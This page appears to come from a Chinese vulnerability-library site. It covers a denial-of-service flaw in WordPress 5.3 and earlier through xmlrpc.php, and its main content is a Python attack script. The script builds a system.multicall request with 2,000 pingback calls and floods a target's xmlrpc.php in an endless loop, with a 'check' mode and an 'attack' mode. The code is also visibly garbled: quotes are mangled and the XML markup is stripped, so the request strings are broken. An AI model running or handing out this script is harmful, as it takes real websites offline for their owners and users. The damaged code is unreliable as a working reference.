WordPress-棉花糖会员站

# WordPress <=5.3.0 xmlrpc.php拒绝服务漏洞 > 原文：[https://www.zhihuifly.com/t/topic/3267](https://www.zhihuifly.com/t/topic/3267)

# WordPress <=5.3.0 xmlrpc.php拒绝服务漏洞 ## 一、漏洞简介 ## 二、漏洞影响 WordPress <= 5.3 ## 三、复现过程漏洞文件 ``` /wordpress/xmlrpc.php /wp/xmlrpc.php ``` ``` from urllib.parse import urlparse import sys, uuid, urllib3, requests urllib3.disable_warnings() DEBUG = True def dprint(X): if DEBUG: print(X) COUNT=0 def build_entry(pingback,target): global COUNT COUNT +=1 entry = “methodNamepingback.ping”

entry += f”params{pingback}/{COUNT}”

#entry += f”params{pingback}/{uuid.uuid4()}”

entry += f”{target}/?p=1”

#entry += f”{target}/#e” # taxes DB more

return entry

def build_request(pingback,target,entries):

prefix = “system.multicall”

suffix = “”

request = prefix

for _ in range(0,entries): request += build_entry(pingback,target)

request += suffix

return request

def usage_die():

print(f”[!] Usage: {sys.argv[0]} “)

exit(1)

def get_args():

if len(sys.argv) != 4: usage_die()

action = sys.argv[1]

pingback = sys.argv[2]

target = sys.argv[3]

if action not in (“check”,“attack”): usage_die()

for URL in (pingback,target):

res = urlparse(URL)

if not all((res.scheme,res.netloc)): usage_die()

return (action,pingback,target)

def main(action,pingback,target):

print(“[>] WordPress <= 5.3.? Denial-of-Service PoC") print("[>] @roddux 2019 | Arcturus Security | [labs.arcturus.net](http://labs.arcturus.net)”)

# he checc

if action == “check”: entries = 2

# he attacc

elif action == “attack”: entries = 2000

# but most importantly

print(f”[+] Running in {action} mode”)

# he pingbacc

print(f”[+] Got pingback URL “{pingback}””)

print(f”[+] Got target URL “{target}””)

print(f”[+] Building {entries} pingback calls”)

# entries = 1000 # TESTING

xmldata = build_request(pingback,target,entries)

dprint(“[+] Request:\n”)

dprint(xmldata+”\n”)

print(f”[+] Request size: {len(xmldata)} bytes”)

if action == “attack”:

print(“[+] Starting attack loop, CTRL+C to stop…”)

rcount = 0

try:

while True:

try:

resp = requests.post(f”{target}/xmlrpc.php”, xmldata, verify=False, allow_redirects=False, timeout=.2)

#dprint(resp.content.decode(“UTF-8”)[0:500]+”\n”)

if resp.status_code != 200:

print(f”[!] Received odd status ({resp.status_code}) – DoS successful?”)

except (requests.exceptions.Timeout, requests.exceptions.ConnectionError) as e:

pass

rcount += 1

print(f”\r[+] Requests sent: {rcount}”,end=””)

except KeyboardInterrupt:

print(“\n[>] Attack finished”,end=”\n\n”)

exit(0)

elif action == “check”:

print(“[+] Sending check request”)

try:

resp = requests.post(f”{target}/xmlrpc.php”, xmldata, verify=False, allow_redirects=False, timeout=10)

if resp.status_code != 200:

print(f”[!] Received odd status ({resp.status_code}) – check target url”)

print(“[+] Request sent”)

print(“[+] Response headers:\n”)

print(resp.headers)

print(“[+] Response dump:”)

print(resp.content.decode(“UTF-8”))

print(“[+] Here’s the part where you figure out if it’s vulnerable, because I CBA to code it”)

except (requests.exceptions.Timeout, requests.exceptions.ConnectionError) as e:

print(“[!] Connection error”)

exit(1)

print(“[>] Check finished”) `if **name** == “**main**”:

main(*get_args())`
“`

文章版权归作者所有，未经允许请勿转载。

THE END

漏洞库

WordPress <=5.3.0 xmlrpc.php拒绝服务漏洞

请登录后发表评论

1会员必看手册（1.8.6版本 25.12.1更新）

2会员手册版本更新（恢复md5解密功能）

3普华科技PowerPms ForgotPassword 存在sql注入

4无境靶场练习：win11通关vulntarget-b

5XWiki Platform 文件读取 (CVE-2025-55749)

6天地伟业Easy7 queryUserbyDesc 存在SQL注入